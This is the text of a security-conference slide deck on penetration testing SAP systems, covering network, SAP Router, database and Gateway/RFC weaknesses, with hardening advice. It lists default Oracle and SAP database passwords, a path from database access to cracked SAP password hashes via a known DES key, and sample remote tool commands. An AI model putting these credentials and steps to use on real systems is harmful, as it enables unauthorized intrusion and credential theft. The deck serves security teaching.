SlideShare a Scribd company logo
1 of 155
Download to read offline
Invest	
  in	
  security	
  
to	
  secure	
  investments	
  
Prac%cal	
  SAP	
  
Pentes%ng	
  
Alexander	
  Polyakov.	
  CTO	
  ERPScan	
  
About	
  ERPScan	
  
•  The	
   only	
   360-­‐degree	
   SAP	
   Security	
   solu%on	
   -­‐	
   ERPScan	
   Security	
  
Monitoring	
  Suite	
  for	
  SAP	
  
•  Leader	
  by	
  the	
  number	
  of	
  acknowledgements	
  from	
  SAP	
  (	
  150+	
  )	
  
•  60+	
  presenta=ons	
  key	
  security	
  conferences	
  worldwide	
  
•  25	
  Awards	
  and	
  nomina=ons	
  
•  Research	
  team	
  -­‐	
  20	
  experts	
  with	
  experience	
  in	
  	
  different	
  areas	
  
of	
  security	
  
•  Headquarters	
  in	
  Palo	
  Alto	
  (US)	
  and	
  Amsterdam	
  (EU)	
  
	
  
	
  
2	
  
3	
  
Introduc)on	
  to	
  SAP	
  
Business	
  applica=on	
  security	
  
All	
  business	
  processes	
  are	
  generally	
  contained	
  in	
  ERP	
  systems.	
  
	
  Any	
  informa)on	
  an	
  a<acker,	
  be	
  it	
  a	
  cybercriminal,	
  industrial	
  spy	
  or	
  
compe)tor,	
  might	
  want	
  is	
  stored	
  in	
  a	
  company’s	
  ERP.	
  	
  
This	
  informa)on	
  can	
  include	
  financial,	
  customer	
  or	
  public	
  rela)ons,	
  
intellectual	
  property,	
  personally	
  iden)fiable	
  informa)on	
  and	
  more.	
  
Industrial	
  espionage,	
  sabotage	
  and	
  fraud	
  or	
  insider	
  embezzlement	
  
may	
  be	
  very	
  effec)ve	
  if	
  targeted	
  at	
  a	
  vic)ms	
  ERP	
  system	
  and	
  cause	
  
significant	
  damage	
  to	
  the	
  business.	
  
4	
  
Big	
  companies	
  
5	
  
	
  
Portal	
  
HR	
  
Logis%cs	
  
Warehouse	
  
ERP	
  
Billing	
  
Suppliers	
  
Customers	
  
Banks	
  
Insurance	
  Partners	
  
Branches	
  
BI	
  
Industry	
  
CRM	
  
SRM	
  
SAP	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
Вставьте	
  рисунок	
  на	
  слайд,	
  скруглите	
  верхний	
  левый	
  и	
  нижний	
  правый	
  угол	
  
(Формат	
  –	
  Формат	
  рисунка),	
  добавьте	
  контур	
  (оранжевый,	
  толщина	
  –	
  3)	
  
6	
  
•  The	
  most	
  popular	
  business	
  applica%on	
  
•  More	
  than	
  250000	
  customers	
  worldwide	
  	
  
•  83%	
  Forbes	
  500	
  companies	
  run	
  SAP	
  
•  Main	
  system	
  –	
  ERP	
  
•  3	
  Main	
  plasorms	
  
• NetWeaver	
  ABAP	
  
• NetWeaver	
  J2EE	
  
• BusinessObjects	
  
SAP	
  NetWeaver	
  ABAP	
  
•  Main	
  plasorm	
  
•  Base	
  plasorm	
  for:	
  ERP,SRC,CRM,PLM	
  	
  
•  Purpose:	
  Automate	
  business	
  processes	
  	
  
•  If	
  compromised:	
  	
  
–  Stopping	
  of	
  business	
  processes	
  
–  Fraud	
  
–  Industrial	
  espionage	
  
7	
  
SAP	
  NetWeaver	
  J2EE	
  
•  Addi%onal	
  plasorm	
  
•  Base	
  plasorm	
  for	
  IT	
  stuff.	
  Like:	
  	
  
–  SAP	
  Portal	
  ,	
  SAP	
  XI,	
  SAP	
  Solu%on	
  Manager,	
  SAP	
  Mobile,	
  SAP	
  xMII	
  
•  Purpose:	
  Integra%on	
  of	
  different	
  systems	
  	
  
•  If	
  compromised:	
  
–  Stopping	
  of	
  all	
  connected	
  business	
  processes	
  
–  Fraud	
  
–  Industrial	
  espionage	
  
8	
  
SAP	
  BusinessObjects	
  
•  Addi%onal	
  plasorm	
  
•  Base	
  plasorm	
  for	
  analy%cs	
  
•  Mostly	
  business	
  oriented:	
  
–  Business	
  Intelligence	
  
–  GRC	
  	
  
•  If	
  compromised:	
  
–  Fraud	
  
–  Industrial	
  espionage	
  
9	
  
10	
  
Introduc)on	
  to	
  SAP	
  
SAP	
  for	
  users	
  
•  Client-­‐server	
  applica%on	
  	
  SAP-­‐GUI	
  with	
  proprietary	
  DIAG	
  
protocol	
  
•  Main	
  func%ons	
  –	
  Transac%ons	
  executed	
  in	
  SAPGUI	
  
•  Also	
  possible	
  to	
  call	
  special	
  background	
  func%ons	
  (RFC)	
  
remotely	
  
•  Possible	
  to	
  modify	
  code	
  of	
  transac%ons	
  or	
  RFC	
  func%ons	
  using	
  
ABAP	
  language	
  
•  Possible	
  to	
  use	
  web-­‐interfaces	
  	
  like	
  Webdynpro	
  or	
  	
  BSP	
  in	
  some	
  
applica%ons	
  like	
  SRM	
  	
  
11	
  
SAP	
  for	
  users	
  
•  SAP	
  Landscape	
  
–  Test,	
  Development,	
  Produc%on,	
  QA	
  
•  SAP	
  Instance	
  
–  Server	
  Instance,	
  Dialog	
  instance	
  
•  Client	
  
–  Default	
  clients	
  
–  Client	
  separa%on	
  
	
  
12	
  
13	
  
DEMO	
  0:	
  
Login	
  to	
  SAP	
  system.	
  
14	
  
Introduc)on	
  to	
  SAP	
  Security	
  
SAP	
  Security	
  
	
  
•  Complexity	
  	
  
	
  Complexity	
  kills	
  security.	
  Many	
  different	
  vulnerabili%es	
  in	
  all	
  
levels	
  from	
  network	
  to	
  applica%on	
  
•  Customiza=on	
  
	
  Can	
  not	
  be	
  installed	
  out	
  of	
  the	
  box.	
  They	
  have	
  many	
  (up	
  to	
  50%)	
  
custom	
  codes	
  and	
  business	
  logic	
  
•  Risky	
  	
  
	
  Rarely	
  updated	
  because	
  administrators	
  are	
  scared	
  they	
  can	
  be	
  
broken	
  during	
  updates	
  and	
  also	
  it	
  is	
  down%me	
  
•  Unknown	
  	
  
	
  	
  Mostly	
  available	
  inside	
  a	
  company	
  (closed	
  world)	
  
	
  
	
  
h}p://erpscan.com/wp-­‐content/uploads/pres/Forgo}en%20World%20-­‐%20Corporate%20Business%20Applica%on%20Systems%20Whitepaper.pdf	
  
15	
  
16	
  
0	
  
100	
  
200	
  
300	
  
400	
  
500	
  
600	
  
700	
  
800	
  
900	
  
2001	
   2002	
   2003	
   2004	
   2005	
   2006	
   2007	
   2008	
   2009	
   2010	
   2011	
   2012	
   2013	
   2014	
  
By	
  2014	
  	
  -­‐	
  2800	
  SAP	
  Security	
  notes	
  
SAP	
  Security	
  notes	
  
SAP	
  Pentes=ng	
  Features	
  
	
  
•  Deeper	
  knowledge	
  of	
  ERP	
  than	
  normal	
  systems	
  required	
  
•  ERP	
  systems	
  are	
  mission	
  cri%cal	
  and	
  cannot	
  be	
  accidentally	
  
taken	
  down	
  (POC	
  exploits	
  too	
  dangerous)	
  
•  Gaining	
  shell	
  /	
  command	
  exec	
  is	
  not	
  the	
  goal	
  
–  Goal	
  is	
  access	
  to	
  sensi%ve	
  data	
  or	
  impact	
  to	
  business	
  processes	
  
	
  
	
  
17	
  
SAP	
  Pentes=ng	
  Features:	
  deeper	
  knowledge	
  
•  Higher	
  difficulty	
  than	
  standard	
  pen	
  tests	
  
•  Required	
  knowledge	
  of:	
  
–  Business	
  processes	
  
–  Business	
  logic	
  
–  Exploit	
  tes%ng	
  impact	
  risk	
  assessment	
  
–  High	
  end	
  databases	
  
–  Numerous	
  (some%mes	
  esoteric)	
  opera%ng	
  systems	
  
–  Different	
  hardware	
  plasorms	
  
–  Common	
  custom	
  implementa%ons	
  
	
  
	
  
18	
  
SAP	
  Pentes=ng	
  Features	
  :	
  Exploita=on	
  
•  Exploit	
  code	
  for	
  ERP	
  not	
  easy	
  to	
  develop	
  	
  
•  Payloads	
  have	
  to	
  be	
  adapted	
  
–  Numerous	
  hardware,	
  OS,	
  release	
  version,	
  and	
  db	
  systems	
  to	
  generate	
  
payloads	
  for	
  
–  In	
  some	
  causes	
  up	
  to	
  50	
  different	
  shellcode	
  varia%ons	
  
•  Building	
  a	
  test	
  environment	
  nearly	
  impossible	
  
–  Takes	
  an	
  expert	
  a	
  week	
  to	
  properly	
  install	
  each	
  varia%on	
  
–  A	
  year	
  to	
  build	
  a	
  comprehensive	
  test	
  environment	
  
	
  
	
  
19	
  
SAP	
  Pentes=ng	
  Features	
  :	
  Shell	
  
•  A	
  be}er	
  approach	
  required	
  with	
  focus	
  on	
  
–  Architecture	
  
–  Business	
  Logic	
  
–  Configura%on	
  	
  
–  You	
  will	
  get	
  administrators	
  access	
  to	
  business	
  data	
  
•  Rather	
  than	
  
–  Program	
  or	
  Memory	
  Vulnerabili%es	
  
–  You	
  will	
  probably	
  gain	
  access	
  to	
  OS	
  and	
  then	
  need	
  to	
  obtain	
  access	
  to	
  
Applica%on	
  
	
  
	
  
20	
  
SAP	
  Security	
  areas	
  
21	
  
Code	
  security	
  
Business	
  security	
  (SOD)	
  
Infrastructure	
  security	
  (Network,OS,Database)	
  
Applica%on	
  plasorm	
  security	
  
Legal	
  user	
  required	
  
Legal	
  user	
  not	
  required	
  
SAP	
  Security	
  areas	
  
22	
  
Code	
  security	
  
Business	
  security	
  (SOD)	
  
Infrastructure	
  security	
  (Network,OS,Database)	
  
Applica%on	
  plasorm	
  security	
  
Legal	
  user	
  required	
  
Legal	
  user	
  not	
  required	
  
Methodologies:	
  EAS-­‐SEC	
  
	
  
•  Enterprise	
  Applica%on	
  Security	
  Project	
  	
  
•  Found	
  in	
  2010	
  
•  Published	
  concept	
  and	
  top10	
  issues	
  for	
  different	
  areas	
  	
  
•  Version	
  2	
  in	
  2004	
  
	
  
Published	
  compliance	
  for	
  SAP	
  NetWeaver	
  ABAP	
  	
  
h}p://erpscan.com/publica%ons/the-­‐sap-­‐netweaver-­‐abap-­‐plasorm-­‐vulnerability-­‐assessment-­‐guide/	
  	
  
	
  
Exists	
  to	
  provide	
  guidance	
  to	
  people	
  involved	
  in	
  the	
  
	
  procurement,	
  design,	
  implementa)on	
  or	
  sign-­‐off	
  	
  
of	
  large	
  scale	
  (i.e.'Enterprise')	
  applica)ons.	
  
	
  
h}p://www.owasp.org/index.php/OWASP_Enterprise_Applica%on_Security_Project	
  	
  
	
  
23	
  
24	
  
Network	
  level	
  security	
  
Network	
  Security	
  Agenda	
  
Top	
  10	
  Network/Architecture	
  issues	
  by	
  EAS-­‐SEC	
  	
  
	
  
1.  Lack	
  of	
  proper	
  network	
  filtra=on	
  between	
  SAP	
  and	
  Corporate	
  
network	
  
2.  Lack	
  or	
  vulnerable	
  encryp=on	
  between	
  corporate	
  network	
  
and	
  SAP	
  
3.  Lack	
  of	
  separa=on	
  between	
  TST	
  DEV	
  and	
  PRD	
  system	
  
4.  Lack	
  of	
  encryp%on	
  inside	
  SAP	
  Network	
  
5.  Insecure	
  trusted	
  rela%ons	
  between	
  components	
  
6.  Insecure	
  configured	
  Internet	
  facing	
  applica=ons	
  	
  
7.  Vulnerable	
  /	
  default	
  configured	
  Gateways	
  
8.  lack	
  of	
  frontend	
  access	
  filtra%on	
  
9.  Lack	
  or	
  misconfigured	
  monitoring	
  IDS/IPS	
  
10.  Insecure	
  /	
  inappropriate	
  wireless	
  communica%ons	
  
	
  
25	
  
Network	
  Security	
  at	
  glance	
  
It	
  is	
  mostly	
  about:	
  
•  Network	
  filtra%on	
  (ACL)	
  
•  Protocol	
  security	
  (Encryp%on)	
  
•  Securing	
  Internet	
  access	
  (SAP	
  Router)	
  
	
  
26	
  
Network	
  filtra=on	
  
27	
  
Almost	
  every	
  listed	
  applica%on	
  	
  have	
  vulnerabili%es	
  and	
  
misconfigura%ons	
  that	
  can	
  be	
  used	
  to	
  gain	
  access	
  to	
  SAP	
  
	
  
h}p://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/4e515a43-­‐0e01-­‐0010-­‐2da1-­‐9bcc452c280b?QuickLink=index&overridelayout=true	
  	
  
28	
  
DEMO	
  1:	
  
Nmap	
  scan	
  of	
  SAP	
  
Why	
  cri=cal?	
  
•  Administra%ve	
  SAP	
  services	
  can	
  have	
  direct	
  Internet	
  access	
  
•  Even	
  if	
  you	
  sure	
  that	
  not	
  
•  To	
  prove	
  in	
  we	
  run	
  “SAP	
  Security	
  in	
  Figures	
  report”	
  
•  All	
  of	
  possible	
  services	
  were	
  found	
  at	
  least	
  once	
  
	
  
29	
  
Myth:	
  SAP	
  systems	
  a6acks	
  	
  available	
  only	
  for	
  insiders	
  
Why	
  cri=cal?	
  
30	
  
About	
  10000	
  systems	
  including:	
  
	
  Dispatcher,	
  Message	
  server,	
  SapHostcontrol,	
  Web-­‐	
  services	
  
Protocol	
  security	
  
31	
  
So`	
  	
   Port	
  	
   Protocol	
   Pass	
  encr	
   Data	
  encr	
   Mi=ga=on	
  
SAPGUI	
   32<SN>	
   DIAG	
   Compession	
  (can	
  be	
  
decompresssed)	
  
Compression	
  (can	
  be	
  
decompressed)	
  
SNC	
  
WEBGUI	
   80<SN>	
   HTTP	
   Base64	
   no	
   SSL	
  
RFC	
   33<SN>	
   RFC	
   XOR	
   no	
   SNC	
  
Message	
  server	
   36<SN>	
   No	
   no	
   SNC	
  
	
  
Visual	
  Admin	
   5<SN>04	
   P4	
   Prorietary	
  (broken)	
   Prorietary	
  (broken)	
  
	
  
SSL	
  
IIOP	
   5<SN>07	
  
J2EE	
  Telnet	
   5<SN>08	
   No	
   No	
   	
  
VPN/Disablse	
  
	
  
LogViewer	
   5<SN>09	
   prorietary	
   md5	
   No	
   NO	
  
MMC	
   5<SN>13	
   HTTP	
   Base64	
   no	
   SSL	
  
32	
  
SAP	
  Router	
  security	
  
SAP	
  Router	
  
SAP	
  Router	
  –	
  reverse	
  proxy	
  server:	
  
•  Transmit	
  connec%ons	
  
–  	
  From	
  internet	
  lo	
  company	
  
–  	
  From	
  SAP	
  AG	
  to	
  company	
  
–  	
  Between	
  networks	
  
–  	
  Between	
  clients/partners	
  
•  Listen	
  by	
  default	
  port	
  3299	
  
•  Can	
  be	
  installed	
  in	
  windows/linux	
  
•  Support	
  encryp%on	
  (SNC)	
  and	
  ACL	
  	
  
33	
  
SAP	
  Router	
  bug	
  1	
  (Table	
  bypass)	
  
There	
  is	
  an	
  ACL	
  table	
  to	
  prevent	
  unauthorized	
  access	
  
•  D	
  	
  172.16.0.1	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  192.168.1.1	
  	
  	
  	
  22	
  
•  P	
  	
  	
  172.16.0.4	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  192.168.1.1	
  	
  	
  	
  3301	
  	
  	
  	
  	
  	
  	
  passwd	
  
•  S	
  	
  	
  172.16.0.5	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  192.168.1.1	
  	
  	
  	
  *	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  passwd	
  
•  .	
  
•  .	
  
•  .	
  
•  KP	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  *	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  192.168.1.1	
  	
  	
  8000	
  
•  P	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  *	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  *	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  *	
  
34	
  
SAP	
  Router	
  bug	
  2	
  (non	
  SAP	
  services)	
  
•  Some%mes	
  administrators	
  use	
  SAPRouter	
  also	
  for	
  rou%ng	
  other	
  
protocols	
  
•  It	
  is	
  possible	
  to	
  connect	
  any	
  port	
  
•  In	
  old	
  versions	
  *	
  means	
  any	
  port	
  is	
  allowed	
  
•  In	
  new	
  versions	
  *	
  means	
  any	
  SAP	
  port	
  is	
  allowed	
  
	
  
•  P	
  	
  172.*.*.*	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  *	
  	
  	
  	
  3389	
  
•  P	
  	
  	
  *	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  *	
  	
  	
  	
  telnet	
  	
  	
  	
  	
  	
  	
  	
  
35	
  
SAP	
  Router	
  bug	
  3	
  
•  Informa%on	
  disclose	
  about	
  router	
  table	
  
•  If	
  router	
  configured	
  with	
  special	
  parameter	
  –I	
  
•  Router	
  table	
  can	
  be	
  remotely	
  disclosed	
  
•  In	
  real	
  world	
  ~20%	
  of	
  routers	
  configured	
  in	
  such	
  way	
  
36	
  
SAP	
  Router	
  bug	
  4	
  (DOS)	
  
•  If	
  you	
  found	
  informa%on	
  disclose	
  
•  Or	
  brute	
  for	
  at	
  least	
  one	
  service	
  which	
  can	
  be	
  accessed	
  thought	
  
SAP	
  Router	
  	
  
•  You	
  can	
  run	
  DOS	
  a}ack	
  on	
  SAP	
  Router	
  
•  By	
  default	
  router	
  pool	
  limited	
  to	
  3000	
  connec%ons	
  
•  In	
  1	
  minute	
  you	
  can	
  disable	
  SAPRouter	
  
37	
  
SAP	
  Router	
  bug	
  5	
  (full	
  access)	
  
•  Auth	
  bypass	
  
•  If	
  router	
  configured	
  with	
  special	
  parameter	
  -­‐x	
  
•  Router	
  can	
  be	
  remotely	
  reconfigured	
  
•  In	
  real	
  world	
  ~8%	
  of	
  routers	
  configured	
  in	
  such	
  way!	
  
	
  
	
  
38	
  
SAP	
  Router	
  bug	
  6	
  (Memory	
  corrup=on)	
  
•  Memory	
  corrup%on	
  issue	
  were	
  found	
  by	
  ERPScan	
  team	
  
•  Remote	
  compromise	
  without	
  authen%ca%on	
  
•  Cant	
  disclose	
  details	
  now	
  	
  
•  85%	
  vulnerable	
  NOW!	
  
	
  
	
  
	
  
39	
  
40	
  
Database	
  level	
  security	
  for	
  SAP	
  systems	
  
Database	
  Security	
  Agenda	
  
•  Cri%cal	
  database	
  data	
  
•  A}acking	
  Database	
  
•  From	
  database	
  to	
  SAP	
  
•  Securing	
  Database	
  
	
  
41	
  
Cri=cal	
  database	
  data	
  
•  We	
  are	
  interested	
  in	
  data	
  that	
  can	
  help	
  us	
  to	
  get	
  into	
  SAP	
  
•  Data	
  stored	
  in	
  tablespace	
  SAPR3	
  or	
  SAP<SID>	
  
•  Interes%ng	
  tables:	
  
	
   	
  USR02	
  —	
  password	
  hashes	
  
	
   	
  SSF_PSE_D	
  —	
  SSO	
  keys	
  	
  
	
   	
  RFCDES	
  –	
  passwords	
  for	
  RFC	
  connec%ons	
  	
  
	
   	
  ICFSERVLOC	
  –	
  passwords	
  for	
  ICF	
  services	
  
	
   	
  REPOSRC	
  –	
  ABAP	
  programs	
  
	
  
42	
  
Afacking	
  Database	
  (OWASP-­‐EAS)	
  
Top	
  10	
  OS	
  Issues	
  by	
  OWASP-­‐EAS	
  
1	
  Default	
  passwords	
  for	
  DB	
  access	
  
2	
  Lack	
  of	
  DB	
  patch	
  management	
  
3	
  Unnecessary	
  Enabled	
  DB	
  features	
  	
  
4	
  lack	
  of	
  password	
  lockout/complexity	
  checks	
  
5	
  Unencrypted	
  sensi%ve	
  data	
  transport	
  /	
  data	
  
6	
  Lack	
  or	
  misconfigured	
  network	
  access	
  control	
  
7	
  Extensive	
  user	
  and	
  group	
  privileges	
  
8	
  lack	
  or	
  misconfigured	
  audit	
  
9	
  Insecure	
  trust	
  rela=ons	
  
10	
  Open	
  addi%onal	
  interfaces	
  
43	
  
SAP	
  Specific	
  
SAP	
  Specific	
  
SAP	
  Specific	
  
Afacking	
  Database	
  (OWASP-­‐EAS)	
  
•  Oracle	
  is	
  s%ll	
  most	
  popular	
  database	
  for	
  SAP	
  
•  By	
  default	
  listen	
  port	
  1527	
  
•  Common	
  a}acks:	
  
–  Default	
  Oracle	
  passwords	
  
–  Simple	
  passwords	
  bruteforce	
  
–  Protocol	
  vulnerabili%es	
  (overflows)	
  
–  Listener	
  a}acks	
  (remote	
  registra%on	
  of	
  log)	
  
44	
  
Direct	
  access	
  to	
  Database	
  =	
  full	
  SAP	
  compromise	
  
•  Default	
  SAP’s	
  database	
  users/passwords	
  
–  SAPR3/SAP	
  
•  Default	
  Oracle	
  database	
  users/passwords	
  
–  SYS/CHANGE_ON_INSTALL	
  
–  SYSTEM/MANAGER	
  
–  SCOTT/TIGER	
  
–  DBSNMP/DBSNMP	
  
45	
  
Default	
  passwords	
  
•  Oracle	
  configura%on	
  REMOTE_OS_AUTHENT	
  
•  If	
  set	
  to	
  TRUE	
  oracle	
  trusts	
  remote	
  system	
  for	
  connec%ng	
  to	
  
listener	
  
•  Remote	
  user	
  must	
  have	
  <SID>ADM	
  name	
  
•  No	
  need	
  for	
  password	
  or	
  anything	
  else!	
  
	
  
46	
  
Misconfigured	
  access	
  control	
  	
  
47	
  
Misconfigured	
  access	
  control	
  	
  
From	
  database	
  to	
  SAP	
  
•  Connect	
  using	
  OPS$<SID>ADM	
  
•  Select	
  encrypted	
  password	
  from	
  SAPUSER	
  table	
  
•  Decrypt	
  it	
  (DES	
  with	
  known	
  key	
  BE_HAPPY)	
  
•  Connect	
  to	
  SAP	
  using	
  user	
  SAPR3/SAPSR3/SAPSR3DB	
  
•  Selec%ng	
  user	
  hashes	
  from	
  SAP<SID>.usr02	
  table	
  
•  Brute	
  hashes	
  using	
  JohnTheRipper	
  
48	
  
Oracle	
  Security	
  Defense	
  
•  Close	
  port	
  1527	
  from	
  everything	
  but	
  SAP	
  
•  Secure	
  listener	
  by	
  password	
  
•  Configure	
  password	
  policies	
  
–  FAILED_LOGIN_ATTEMPTS	
  
–  PASSWORD_VERIFY_FUNCTION	
  
•  Change	
  default	
  passwords	
  
•  Encrypt	
  data	
  transfer	
  
•  Enable	
  SQL	
  Audit	
  at	
  DB	
  
	
  
	
  
49	
  
50	
  
SAP	
  Applica)on	
  plaUorm	
  security	
  
SAP	
  NetWeaver	
  
	
  
51	
  
52	
  
SAP	
  Frontend	
  	
  security	
  
Why	
  Afack	
  users	
  
•  Users	
  are	
  less	
  secure	
  	
  
•  There	
  are	
  thousands	
  SAP	
  users	
  in	
  one	
  company	
  	
  
•  You	
  can	
  a}ack	
  them	
  even	
  if	
  Server	
  is	
  fully	
  secured	
  
•  You	
  can	
  a}ack	
  them	
  from	
  outside	
  	
  
•  You	
  can	
  use	
  them	
  as	
  proxy	
  for	
  a}acking	
  servers	
  
	
  
	
  
53	
  
Typical	
  Client	
  So`ware	
  for	
  SAP	
  
•  SAPGUI	
  
•  JAVAGUI	
  	
  
•  WEBGUI	
  	
  
•  NWBC	
  	
  	
  	
  	
  
•  RFC	
  	
  
•  Applica%ons	
  such	
  as	
  VisualAdmin,	
  Mobile	
  client	
  and	
  many-­‐many	
  
other	
  	
  
	
  
	
  
54	
  
Typical	
  Client	
  So`ware	
  for	
  SAP	
  
	
  
55	
  
Date	
   Vulnerable	
  
Component
Author Vulnerability Link
04.01.2007 Rfcguisink 	
  Mark	
  Litchfield	
   BOF h}p://www.ngsso–ware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐
enjoysap-­‐stack-­‐overflow/	
  
04.01.2007 Kwedit 	
  Mark	
  Litchfield BOF h}p://www.ngsso–ware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐
enjoysap-­‐stack-­‐overflow/
07.11.2008 Mdrmsap 	
  Will	
  Dormann	
  	
   BOF h}p://www.securityfocus.com/bid/32186/info
07.01.2009 Sizerone 	
  Carsten	
  Eiram BOF h}p://www.securityfocus.com/bid/33148/info
31.03.2009 WebWiewer3D 	
  Will	
  Dormann	
  	
   BOF h}p://www.securityfocus.com/bid/34310/info
15.04.2009 Kwedit Carsten	
  Eiram Insecure	
  Method h}p://secunia.com/secunia_research/2008-­‐56/
08.06.2009 Sapirrfc 	
  Alexander	
  Polyakov	
  (DSecRG) BOF h}p://dsecrg.com/pages/vul/show.php?id=115
28.09.2009 WebWiewer3D Alexander	
  Polyakov	
  (DSecRG) Insecure	
  Method h}p://dsecrg.com/pages/vul/show.php?id=143	
  
28.09.2009 WebWiewer2D Alexander	
  Polyakov	
  (DSecRG) Insecure	
  Method h}p://dsecrg.com/pages/vul/show.php?id=144	
  
	
  07.10.2009 VxFlexgrid 	
  Elazar	
  Broad	
  ,	
  
	
  Alexander	
  Polyakov	
  (DSecRG)
BOF h}p://dsecrg.com/pages/vul/show.php?id=117
23.03.2010 BExGlobal Alexey	
  Sintsov	
  (DSecRG) Insecure	
  Method h}p://dsecrg.com/pages/vul/show.php?id=164
unpublished Kwedit	
   Alexander	
  Polyakov,	
  Alexey	
  Troshichev	
  	
  
(DSecRG)
Insecure	
  Method h}p://dsecrg.com/pages/vul/show.php?id=145	
  
14.12.2010	
   RFCSDK 	
  Alexey	
  Sintsov	
  (DSecRG) Memory	
  Corrup%on h}p://dsecrg.com/pages/vul/show.php?id=169	
  
14.12.2010 	
  RFCSDK 	
  Alexey	
  Sintsov	
  (DSecRG) Format	
  String h}p://dsecrg.com/pages/vul/show.php?id=170	
  
unpublished	
   	
  DSECRG-­‐00173 	
  Alexander	
  Polyakov	
  (DSecRG) Insecure	
  Method later
22.12.2010 NWBC Alexey	
  Sintsov	
  (DSecRG) Memory	
  Corrup%on h}p://dsecrg.com/pages/vul/show.php?id=210
Implementa=on	
  fails	
  	
  
•  Distribu%ves	
  usually	
  stored	
  on	
  shared	
  folder	
  	
  
•  If	
  you	
  can	
  gain	
  this	
  access	
  it	
  is	
  possible	
  to	
  overwrite	
  dll’s	
  
•  Or	
  modify	
  configura%on	
  file	
  with	
  BOF	
  issues.	
  
•  Or	
  overwrite	
  configura%on	
  files	
  with	
  fake	
  SAP	
  server	
  
	
  
	
  
56	
  
57	
  
SAP	
  NetWeaver	
  –	
  Applica)on	
  server	
  services	
  
SAP	
  NetWeaver:	
  main	
  components	
  
•  NetWeaver	
  Applica=on	
  Server	
  ABAP	
  
–  SAP	
  Gateway	
  
–  SAP	
  Message	
  server	
  
–  SAP	
  Message	
  server	
  HTTP	
  
–  SAP	
  Dispatcher	
  
–  SAP	
  ICM	
  
–  SAP	
  MMC	
  
–  SAP	
  HostControl	
  
•  NetWeaver	
  Applica=on	
  Server	
  JAVA	
  
–  HTTP	
  Server	
  
–  SAP	
  Portal	
  
58	
  
59	
  
SAP	
  Gateway	
  security	
  
SAP	
  NetWeaver	
  
	
  
60	
  
SAP	
  Gateway	
  
SAP	
  Gateway	
  also	
  called	
  Applica=on	
  Server.	
  
•  One	
  of	
  the	
  core	
  SAP	
  services	
  
•  Allows	
  interac%on	
  with	
  remote	
  SAP	
  systems	
  and	
  also	
  with	
  other	
  
systems	
  
•  Manages	
  the	
  communica%on	
  for	
  all	
  RFC	
  based	
  func%onality	
  
–  Gateway	
  monitor	
  (Administra%on	
  )	
  
–  Gateway	
  Reader	
  (	
  RFC)	
  	
  
–  Gateway	
  work	
  process	
  (	
  logging	
  )	
  
	
  
	
  
	
   61	
  
h}p://scn.sap.com/people/ma}.kangas/blog/2009/03/03/sap-­‐netweaver-­‐executables	
  
Gateway	
  Monitor	
  
•  Gateway	
  Monitor	
  
•  Access	
  for	
  analyzing	
  gateway	
  process	
  
•  You	
  can	
  specify	
  3	
  op%ons	
  for	
  security	
  
–  Gw/monitor=0	
  forbidden	
  access	
  
–  Gw/monitor=1	
  only	
  local	
  access	
  (default	
  now)	
  
–  Gw/monitor=2	
  local	
  and	
  remote	
  access	
  (default	
  before	
  6.2)	
  
	
  
	
  
62	
  
Gateway	
  Monitor	
  
•  If	
  Gw/monitor=2	
  	
  it	
  is	
  possible	
  to	
  run	
  cri%cal	
  commands	
  and	
  
obtain	
  some	
  informa%on	
  	
  remotely	
  
•  Remote	
  monitoring	
  can	
  be	
  done	
  by	
  GWMON	
  tool	
  
•  Stored	
  in	
  /usr/exe/	
  
•  Example:	
  	
  gwmon	
  -­‐gwhost	
  127.0.0.1	
  -­‐gwserv	
  3200	
  
	
  
	
  
63	
  
64	
  
DEMO	
  9:	
  
Playing	
  with	
  GWMON	
  
Gateway	
  RFC	
  	
  (3	
  types)	
  	
  
•  ABAP	
  RFC	
  	
  	
  
–  client	
  call	
  SAP-­‐server	
  
•  Registered	
  RFC	
  Server	
  Program	
  	
  
–  	
  Client	
  call	
  addi%onal	
  programs	
  
	
  installed	
  on	
  Other	
  servers	
  via	
  Gateway	
  
	
  
	
  
•  Started	
  RFC	
  Server	
  Program	
  
–  	
  Client	
  call	
  addi%onal	
  programs	
  
	
  	
  that	
  installed	
  on	
  SAP-­‐server	
  	
  
	
   65	
  
ABAP	
  RFC	
  -­‐	
  overview	
  
•  Most	
  commonly	
  used	
  
•  It	
  is	
  like	
  windows	
  RPC	
  
•  User	
  can	
  call	
  ABAP	
  remote-­‐enabled	
  func%ons	
  	
  
•  need	
  to	
  know:	
  	
  
–  System	
  id	
  
–  Client	
  
–  userid	
  
–  password	
  	
  
	
  
•  There	
  are	
  about	
  30000	
  different	
  RFC	
  func%ons	
  	
  in	
  different	
  
groups	
  
	
  
	
  
	
  	
  
	
  
66	
  
ABAP	
  RFC	
  -­‐	
  execu=ng	
  
How	
  to	
  call	
  RFC	
  func=on	
  remotely?	
  
•  Use	
  default	
  tool	
  usrsapERPSYSexerunstartrfc	
  
•  Use	
  default	
  creden%als	
  or	
  exis%ng	
  user	
  creden%als	
  
	
  
Example:	
  
	
  
	
  	
  	
  	
  	
  	
  	
  >Startrfc.exe	
  -­‐3	
  –h	
  172.16.0.222	
  –s	
  	
  01	
  –c	
  	
  800	
  –F	
  RFC_PING	
  -­‐t	
  
	
  
Don’t	
  miss	
  parameters	
  order	
  because	
  you	
  will	
  get	
  errors!	
  
	
  
	
  
	
